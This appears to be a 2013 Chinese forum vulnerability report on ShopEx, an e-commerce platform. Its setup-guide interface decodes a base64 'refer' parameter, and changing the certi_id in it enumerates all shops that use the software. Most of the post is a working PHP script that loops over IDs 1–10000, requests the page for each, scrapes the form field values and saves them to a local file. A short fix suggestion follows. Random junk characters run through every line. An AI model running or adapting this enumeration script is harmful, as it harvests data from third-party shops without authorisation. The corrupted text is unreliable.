|
|
简要描述:
$ ^7 L! K* Y& v, x& |: cShopEx某接口缺陷,可遍历所有网站5 u9 o( X& e8 V0 N( g M. A
详细说明:
& ?. {' i" g4 m# z. m问题出现在shopex 网店使用向导页面
% c7 t& t: ~5 X( r6 w/ b
+ t, B# g* X8 F) G* K `' J7 n# a
# l5 L2 Z+ t# o( R, Chttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
# \5 B/ H3 j8 `
+ i* a6 t6 ^4 s2 g, O% u% X V; u3 P
b; P# t- A9 H. I
7 c. g' j( x8 j' ~refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
/ ^# k; z; X! G9 W; d z, M8 U1 h" R) h# W4 b: o! A
4 O+ l& E3 r+ l! W
2 O7 O6 G4 v* B% R6 y6 D
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 ) e& o. R$ | d' j7 X
! g' j [8 f+ F
4 V A r- T! b6 u ?8 Y, i
+ T- x8 W" y# t2 B
<?php5 M& t- g9 ~( n C% u" q
+ l3 i0 D. n7 Y
for ($i=1; $i < 10000; $i++) { //遍历
9 K; q. f8 I7 u! C; q3 d$ x- K0 P9 u/ @+ l* A* l
ShowshopExD($i); \7 y! M4 o2 X4 N+ c v6 e- G0 K
' [! X5 m% d: I" \. ~) R n4 i9 } }: L* f; O3 O& c9 t2 V) I( v+ E
! w `7 b* M9 G/ q; T j6 _$ S
function ShowshopExD($cid) {
1 `0 Y. v$ W0 S3 \) [5 P L+ s1 f) B7 ^6 y7 `
$url='http://guide.ecos.shopex.cn/step2.php';
: w5 E- G: j/ D7 @. D& c$ C: R9 y2 }& N
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');: m: Y: y0 i' c! t+ Z
2 l: E9 P# r$ B# o2 v $url = $url.'?refer='.$refer;0 w4 s4 m. S/ x. f; h/ Y s( ?
5 [+ h7 x+ C" _: s7 B' k $ch = curl_init($url);3 E! D' |$ p) w+ c0 q3 S6 r
/ I) A/ Y4 N9 _4 L0 e* C* w
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
" {- x8 e% O, w- J8 w
3 l, p6 f3 S" U/ U curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
4 ]7 X- h1 u5 M. X+ U0 Z4 R2 v; t
% n/ l. j' |) H. P; X* z. |5 d $result = curl_exec($ch);
?) \) R" }9 ~. X6 m
/ J* n. z1 _1 k) P/ }" W$ G $result = mb_convert_encoding($result, "gb2312", "UTF-8");
D' d) D8 p& {4 W/ p H" O( `( x) Q
if(strpos($result,$refer))3 w, U: O8 z3 t7 x
; g) ]- ~7 }: ]7 R2 D g7 R. ^
{
. Z4 z# l. D& I
- |# A$ u' y& T7 j4 H" c C $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
7 |$ e7 \# t4 E9 D6 v9 }
- G( b3 G1 }4 N9 {& s preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
: {' R0 w O; S! {1 z& C1 E8 `* y+ Z
+ @9 n+ N- \+ S" A! i; y3 ]' s foreach ($value[1] as $key) {
2 L. n7 M9 R, @6 v2 T1 C. G( [) e8 @1 ~
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);, Z' z* ?! q1 P* `% l1 U# _
1 y2 B* N' b8 R3 j echo $res[1][0].':'.$res[3][0]."\r\n";
& ]8 @, X' W/ U7 l% A9 r" E6 ~6 h9 w* _: }$ [, I
$col =$res[1][0].':'.$res[3][0]."\r\n"; 7 J1 z8 `2 w t/ b
0 ~# `/ x( o! b' l6 Y4 X9 [2 k# j fwrite($fp, $col, strlen($col));
- n7 i$ f6 K% h# T$ h% Q$ g+ g/ F0 A8 Y+ k6 ?# U
}$ p: F$ V1 Z$ |6 {, _
5 N! R$ a5 j, ^) F* `8 P
echo '--------------------------------'."\r\n";
$ l$ h ~: v7 N; f7 d. H& q6 }% R. x% B8 u6 C9 Z1 O2 ^1 z* X
fclose($fp);
. h+ q- N0 r1 \: A" G3 M4 d. E0 l
$ g; a" A4 O( n8 ~5 w. _ }
8 F% b/ ^7 v& O, J X2 O
8 Z; B% B3 L7 Z: E& P flush();+ P& W4 B) \) D
8 h( O& o) w" Q L curl_close($ch);
P1 ?6 R; d( x) n \( c, h6 V9 g7 d" i8 i4 J
}
4 x/ b$ ]* ~' [9 F
& h, Z1 d% `6 b0 h. [?>, w$ c' c# Z4 v# w6 l7 C5 s1 i/ f. W7 e
漏洞证明:( L+ L D& L! a6 }( |) g: i C5 [
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg, g% m% k4 g2 x% b3 N8 P/ Z
refer换成其他加密方式- f2 F, d7 q& s7 i4 L
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对